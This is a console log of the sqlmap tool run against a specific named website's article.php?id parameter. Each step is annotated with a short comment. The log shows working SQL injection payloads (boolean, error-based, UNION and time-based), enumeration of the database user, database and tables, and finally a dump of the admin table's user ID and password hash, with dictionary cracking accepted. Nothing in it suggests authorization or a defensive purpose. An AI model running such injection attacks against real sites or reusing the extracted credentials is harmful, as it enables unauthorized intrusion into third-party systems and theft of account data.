D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap>